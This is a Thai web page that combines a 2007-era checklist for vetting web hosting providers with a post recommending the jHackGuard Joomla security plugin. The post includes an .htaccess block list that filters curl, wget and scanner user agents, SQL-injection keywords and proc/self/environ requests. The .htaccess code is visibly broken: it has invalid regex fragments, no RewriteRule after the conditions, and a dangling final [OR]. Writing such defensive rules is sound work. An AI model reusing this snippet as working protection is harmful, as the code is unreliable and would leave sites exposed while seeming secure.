1. บริษัทที่จดทะเบียนถูกต้อง ไม่ได้หมายความว่าจะเป็นบริษัทที่เชื่อถือได้ หรือจะอยู่กับเราไปตลอดรอดฝั่ง เพราะธุรกิจ web hosting มีไม่น้อยที่ทำแล้ว พูดได้ว่าเจ้ง หรือขาดทุน อยู่ไม่ถึงปี มีให้เห็นเยอะแยะ ถึงจะเป็นบริษัทที่จดทะเบียนถูกต้อง เค้าก็สามารถปิดกิจการหรือหนีไปกันดื้อๆก็ได้ แล้วการจดทะเบียนบริษัท ก็ทำได้ง่ายมาก ครั้นจะไปตามทวงเงินไม่กี่พัน กับการจ้างทนายความ ส่วนใหญ่ก็ไม่มีใครทำกันอยู่แล้ว มีออฟฟิศสวยหรู ก็ไม่ได้รับประกันว่าจะมีกำไร หรือเป็นเว็บโฮสที่ดี แต่ในการกลับกัน กลายเป็นการเพิ่มต้นทุนที่มากขึ้นเท่านั้น

แต่ทุกวันนี้ web hosting ทุกที่ก็แทบจะจดทะเบียนบริษัทถูกต้องแล้วทั้งนั้น แล้วจะทำยังไงดี อ่านไปเรื่อยๆเลยครับ

2. เมื่อเข้าไปใหนหน้าเว็บของบริษัท หรือเว็บโฮสนั้นๆ หาดูตรงรายชื่อลูกค้าของเรา แน่นอน ทุกบริษัทมักจะโม้ โอ้อวด บรรยายสรรพคุณต่างๆนาๆ ว่าลูกค้าของเรา มีเป็นร้อยเป็นพัน ทั้งภาครัฐและเอกชน (พูดให้ดูน่าเชื่อถือ) พร้้อมทั้งมีรายชื่อให้เราดู เพื่อให้เรารู้สึกมั่นใจ เชื่อใจมากยิ่งขึ้น แต่นั่น กลับกลายเป็นหลุมฝังให้บริษัทนั้นเลยล่ะ เพราะอะไรเหรอ? Frank W. Abagnale ยอดนักต้มตุ๋นระดับโลกเคยบอกไว้ว่า ยิ่งดูน่าเชื่อถือเท่าไร ยิ่งหลอกได้ง่ายขึ้นเท่านั้น

วิธีตรวจสอบง่ายมาก ที่ใหนที่ลงแค่ชื่อบริษัทอย่างเดียว ไม่มี url ลูกค้าบอกกำกับให้คลิ้กเข้าไป อย่าไปใช้บริการของเค้าเด็ดขาด!! เพราะชื่อบริษัท ใครๆก็เขียนได้ อยากจะเขียนสัก 2-3 พัน บริษัทก็ทำได้ ลอกมาจากสมุดหน้าเหลือง หรือกรมพานิชย์เลยครับ ยิ่งที่ใหนเขียนหรือบอกว่ามีลูกค้าเกิน 500 ราย แต่เปิดมาไม่ถึง 5 ปีนี่ ตัดออกไปได้เลย โกหกแน่นอน แต่เดียวก่อน ถ้าเราอยากพิสูจน์ หรืออาจจะเป็นจริงก็ได้ ทำไงดีล่ะ? อ่านต่อเลยครับ

3. หาเว็บโฮสติ้งที่ลง url ของลูกค้าที่ให้คุณคลิ้กไปดูได้แทนครับ แต่แค่นี้ยังไม่พอ! เราต้องตรวจสอบด้วยว่า ไอ้ url ลูกค้าที่เขียนๆมาน่ะ มันลูกค้าของเค้าจริงหรือป่าว? ไม่ใช่ว่าไปมั่วเอาของคนอื่นมาใส่ โมเมหลอกลูกค้าไปวันๆ หรือชื่อลูกค้าที่เขียนมากว่าครึ่ง ปัจจุบันเค้าย้ายออกไปที่อื่นหมดแล้ว
เรามีวิธีตรวจสอบมีดังนี้ครับ

เข้าไปที่เว็บ http://www.robtex.com/route/ หรือบริการตรวจสอบ IP/dns ของอะไรก็ได้ หรือจะใช้ ping ง่ายๆก็ได้ จากนั้นลองใส่ชื่อลูกค้าที่เค้าเขียนมาลงไปสัก 4-5 อัน แล้วแต่ความขยันของเรา ถ้า IP เหมือนกันหมด หรือต่างกันไม่เกิน 3 IP (หรืออาจจะต่างกันมากกว่านั้นมีหลาย server) และควรอยู่ใน subnet เดียวกัน หรือใกล้ๆกัน แสดงว่าเป็นลูกค้าของเค้าจริงครับ ให้ดู IP และ ns/mx record ด้วยนะครับ

ตรงนี้อาจจะต้องสอบถามทางโฮสด้วยว่าเค้ามี server ทั้งหมดกี่เครื่อง (เรายังมีวิธีตรวจสอบอีก ว่ามันโม้หรือปล่าว)

ตรงนี้ ถ้าคุณเจอเว็บลูกค้าที่ไม่ใช่ IP ของบริษัทโฮสติ้งนั้นๆละก็ เสียคนแน่ครับ นำมาประจานให้คนอื่นๆทราบด้วยก็จะดี จะได้ไม่ถูกหลอก ถือว่าหลอกหลวง เอาชื่อเว็บอื่นมาแอบอ้างว่าเป็นลูกค้า และจริงๆแล้วมีความผิดตามกฏหมายด้วย แต่ผมก็ยังไม่เคยเห็นใครแจ้งจับ หรือถูกจับเลย อืม..

4. พอเราตรวจเว็บลูกค้าของเค้าว่าเป็นลูกค้าจริงๆแล้ว ให้ลองดูเว็บที่มีคนเข้าเยอะๆหน่อย ยิ่งเยอะยิ่งดี ยิ่งดังยิ่งดี ให้พยายามหาเบอร์ติดต่อเลยครับ สอบถามว่าทางเว็บใช้โฮสของอะไร (ถามอีกครั้งเพื่อความแน่ใจ) แล้วสอบถามคุณภาพ การบริการ ประวัติย้อนหลังครับ ตรงนี้อาจจะไม่จำเป็นมาก ถ้าเราใช้ทำ web เล็กๆ คนเข้าไม่เยอะ หรือเน้นประหยัด แต่ถ้าคิดใช้นานๆ ราคาสูง ใช้เนื้อที่มากๆ ให้ความสำคัญมากหน่อย ก็ทำได้ก็ดีครับ

5. จำนวนลูกค้าที่ทางบริษัทหรือโฮสติ้งเขียนเอาไว้ก็สำคัญครับ บางที่ที่ผมบอกว่ายิ่งโม้เยอะ ยิ่งกลายเป็นหลุมฝั่งตัวเองนั่นล่ะ ทำไมเหรอครับ ก็ถ้าสมมุติว่าเค้ามี server 2 เครื่อง (โดยทั่วไปๆ แบ่งเป็น Windows 1 และ Linux 1 เครื่อง) แต่บอกว่ามีลูกค้า 500 รายหรือมากกว่า ซึ่งเท่ากับ server ละ 250 web ถามว่าถ้าเป็นจริง คุณอยากจะเข้าไปอยู่ใน server นั้นเป็น web ที่ 251 มั้ยล่ะ? ช้าตายเลยครับ ปกติแล้ว server 1 ตัวแรงๆเลย เค้ายอมรับกันได้ที่ประมาณไม่เกิน 100 เว็บ หรือมากน้อยกว่านั้นตามการใช้งาน หรือ ถ้ามีเว็บใหญ่ๆอยู่ด้วย ยิ่งที่ใหนเขียนไว้เกิน 500 ราย คุณหาที่อื่นได้เลยครับ ถ้าไม่โกหก หรือมี server มากกว่า 5 เครื่อง ก็เดาว่าคุณภาพต้องต่ำมากแน่ๆ

6. วิธีตรวจสอบว่ามี server จริงๆกี่เครื่อง เป็นรุ่นอะไร IP อะไร ไม่ยาก ขอดูใบเสร็จเลยครับ ให้เค้า fax มาให้ก็ได้ และมีรูปถ่ายด้วยก็จะดีมาก แต่ในรูปควรจะมี IP กำกับหน้าเครื่องหรือชื่อบริษัทด้วยนะ! ไม่ใช่ไปถ่าย server คนอื่นมา เว็บใหนไม่มีรูปถ่าย หรือไม่มีใบเสร็จ แสดงว่าใช้เครื่อง PC ธรรมดามาทำเป็น server ครับ หรืออาจจะโม้เสปคเกินจริง อันนี้ถือว่าใช้ไม่ได้ คืออาจจะพอใช้ได้ แต่การนำ PC หรือแม้แต่ server คุณภาพต่ำ หรือสเปคต่ำมาใช้ มันจะมีผลเสียในระยะยาวครับ สัก 1 ปีขึ้นไป อุปกรณ์หลายๆตัวจะเริ่มเสีย ส่งผลให้เว็บล่มหรือ down บ่อย เพราะไม่ได้ออกแบบมาให้ใช้งานหนักตลอด 24 ชั่วโมง

7. ดูราคาค่าบริการก็สำคัญ ค่าบริการในจุดคุ้มทุนตรงนี้จะขึ้นอยู่กับ คุณภาพของ server และค่าเช่า bandwidth/colocation/ISP ประกอบกัน ที่ใหนให้ราคาถูก ก็ย่อมมีคุณภาพที่ลดลงไปตามราคา แต่ก็ไม่ใช่ว่าแพงแล้วจะดี แพงกว่าแต่ห่วยเหมือนกันก็มีเยอะ ตรงนี้ต้องดูหลายๆอย่างประกอบกัน เช่น บอกว่าใช้ server XEON รุ่น top 2 cpu + hot swap scsi320 + dual power supply เรียกว่า server ราคาเกือบ 2 แสน แต่ค่าบริการเดือนละ 1-3 ร้อยบาท ต่อ 500MB อันนี้ให้คิดว่ามีลับลมคมใน หรือมีบางอย่างไม่ชอบมาพากลไว้ก่อน เพราะ server ราคา 1.5-2 แสน (อาทิพวก HP,DELL, IBM) ควรจะมีรายได้จากลูกค้ามากกว่า 3 หมื่นบาทต่อเดือน ถ้าคิดแค่ 1-3 ร้อย ถามว่าต้องมีกี่เว็บต่อ server ล่ะครับ? นี่ยังไม่ได้คิดกำไร หรือค่าใช้จ่ายอื่นๆนะ! ยิ่งพวกราคา 59 บาท 99 บาท เนื้อที่ 1GB นี่ผมบอกตรงๆนะ ไม่กล้าจะใช้บริการครับ ถ้าใช้ทำเว็บเก็บรูปส่วนตัวอ่ะ พอได้อยู่

พูดง่ายๆก็คือ ราคาต้องเหมาะสมกับคุณภาพ หรือสรรพคุณที่แจ้งไว้! แต่ต้องมั่นใจด้วยว่าอุปกรณ์หรือสรรพคุณที่แจ้งไว้ เป็นความจริง!

8. ประสบการณ์และเวลาที่ประกอบธุรกิจมาก็สำคัญ แต่ก็ต้องดูด้วยว่าไอ้ที่เปิดมานานๆ มีลูกค้าเยอะๆแล้วเนี่ย server ได้อัพเกรดบ้างหรือปล่าว ซอฟแวร์ได้อัพเกรดบ้างมั้ย หรือเข้าเว็บช้า อืด เพราะอัดลูกค้าเข้าไปเยอะหรือปล่าว ตรงนี้ก็พูดยากว่าเปิดมานานกว่าแล้วดีกว่า หาทางสอบถามลูกค้าของโฮสนั้นๆได้ก็จะดีเลยกว่าครับ

9. ตรวจสอบ software ในระบบดูด้วยว่ามีการอัพเดตบ้างหรือปล่าว บางที่ใช้ php 4.3 (ล่าสุดเป็น 4.4.7 ณ.เดือนกันยายน 2550) อยู่ก็ถือว่าเก่ามากๆ ไม่ควรจะเก่าเกิน 6 เดือนเป็นอย่างต่ำ หรือใช้ mysql 4.0.x ที่เก่ามากๆ (ล่าสุดเป็น 4.1.22 และ 5.0.45 เช็คได้จาก www.mysql.com หรือเว็บของบริษัทนั้นๆ)

ถามว่าทำไมถึงควรจะเป็นเวอร์ชั่นล่าสุด? เพราะว่าซอฟแวร์ทุกตัวมันจะมี bug เสมอครับ รวมไปถึงช่องโหว่ด้านความปลอดภัยต่างๆ หากคุณลองอ่าน release note หรือ document ของ php และ mysql ย้อนหลังดู มักจะมีการแก้บัก ช่องโหว่ รวมไปถึงการปรับปรุงประสิทธิภาพให้ดียิ่งขึ้น รองรับมาตรฐานใหม่ๆ เป็นต้น อย่างตอนนี้ ทาง php ก็ประกาศออกมาแล้วด้วยว่า ภายใน 1 ปีข้างหน้า จะเลิก support php เวอร์ชั่น 4 แล้ว แล้วจะพยายามผลักดันให้ใช้ php5 ขึ้นไปแทน เมื่อรู้อย่างนี้แล้ว รีบเช็ค hosting ที่คุณใช้อยู่ หรือที่คุณกำลังมองหาอยู่ด้วยล่ะ

10. สอบถามถึงความถี่ในการ backup ข้อมูลไปยังแหล่งอื่น อาทิ tape backup/ storage drive/server สำรอง หรืออะไรก็แล้วแต่ แต่ตรงนี้ตรวจสอบยากครับ อาจจะขอ logs เค้าดูหรือ schedule logs ก็ได้

nitrous123 :  citec.us

ป้องกันการแฮก Joomla ด้วย jHackGuard

การโดนแฮกเป็นสิ่งไม่น่าพิศมัยนัก ถ้าเราป้องกันได้ก็จะอุ่นใจได้บ้าง การโดนแฮกสามารถโดนได้หลายทาง เช่น

  • ไปติดโทรจันมาจากเว็บอื่น แล้วโดนขโมยข้อมูล Ftp ของเว็บ
  • ใช้จูมล่า แล้วไม่อัพเดต เป็นรุ่นใหม่ หรือ ลงคอมโพเน้น โมดูลไป ไม่ตามอัพเดต ก็เป็นช่องทางให้ Hacker เข้ามาเจาะระบบได้
  • Hosting ที่ใช้มีการตั้งค่าที่ไม่ปลอดภัย

วันนี้จะมาแนะนำ plugin ของ joomla! ชื่อ jHackGuard ของ เว็บ SiteGround ซึ่ง เขียนมาจากประสบการณ์ที่เขาดูแลเว็บที่เป็นจูมล่าบนโฮสเขาเองซึ่ง jHackGuard จะเป็นด่านป้องกันเว็บที่ทำด้วยจูมล่า

ป้องกันอะไรบ้าง

  • SQL Injections
  • Remote URL/File Inclusions
  • Remote Code Executions
  • XSS Based Attacks!

การติดตั้ง

เมื่อติดตั้งเสร็จก็ เปิดใช้งานแค่นี้ครับ ได้แล้ว

โหลดได้ที่ http://extensions.joomla.org/extensions/access-a-security/site-security/site-protection/13233?qh=YToxOntpOjA7czoxMDoiamhhY2tndWFyZCI7fQ%3D%3D

 

หรืออยากได้เร็ว

http://www.colorpack.net/images/jhackguard.zip

 

แถม เพิ่มความมั่นใจอีกชั้นด้วย การป้องกันที่ .htaccess เพิ่ม code ลงไป ที่ไฟล์ .htaccess หลังจากบันทัดที่มีคำว่า

########## End – Joomla! core SEF Section

เพิ่ม code ด้านล่างลงไป

ServerSignature Off
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC,OR]
RewriteCond %{THE_REQUEST} ^.*(\\r|\\n|%0A|%0D).* [NC,OR]

RewriteCond %{HTTP_REFERER} ^(.*)(<|>|?|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{HTTP_COOKIE} ^.*(<|>|?|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]
RewriteCond %{REQUEST_URI} ^/(,|;|:|<|>|?>|?<|/|\\\.\.\\).{0,9999}.* [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ^$ [OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww-perl|curl|wget|python|nikto|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|?|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR]

#Block mySQL injects
RewriteCond %{QUERY_STRING} ^.*(;|<|>|?|?|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR]

RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*\.[A-Za-z0-9].* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(<|>|?|%0A|%0D|%27|%3C|%3E|%00).* [NC]

RewriteCond %{QUERY_STRING} proc\/self\/environ [OR]

 

 

ที่มา http://www.joomlacorner.com/article/15-plugin-joomla/554-protect-hack-joomla-jhackguard.html